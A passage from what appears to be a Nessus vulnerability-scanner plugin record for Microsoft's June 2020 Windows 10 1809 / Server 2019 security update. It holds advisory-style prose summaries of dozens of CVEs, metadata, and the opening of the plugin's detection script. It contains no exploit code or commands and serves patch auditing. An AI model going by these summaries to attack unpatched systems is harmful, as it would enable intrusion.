* A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory. An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)
* An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)
* An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-1204)
* An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change, or delete data. (CVE-2020-1201)
* A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)
* A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)
* An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)
* A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)
* An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability.
The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. 
An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. 
The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1277, CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. 
An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. 
An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could cause a system to stop responding. 
(CVE-2020-1244)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1274", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561608.NASL", "href": "https://www.tenable.com/plugins/nessus/137256", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137256);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1296\",\n 
\"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561608\");\n script_xref(name:\"MSFT\", value:\"MS20-4561608\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561608: Windows 10 Version 1809 and Windows Server 2019 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. 
(CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. 
An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. 
(CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. 
An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. 
The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. 
An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
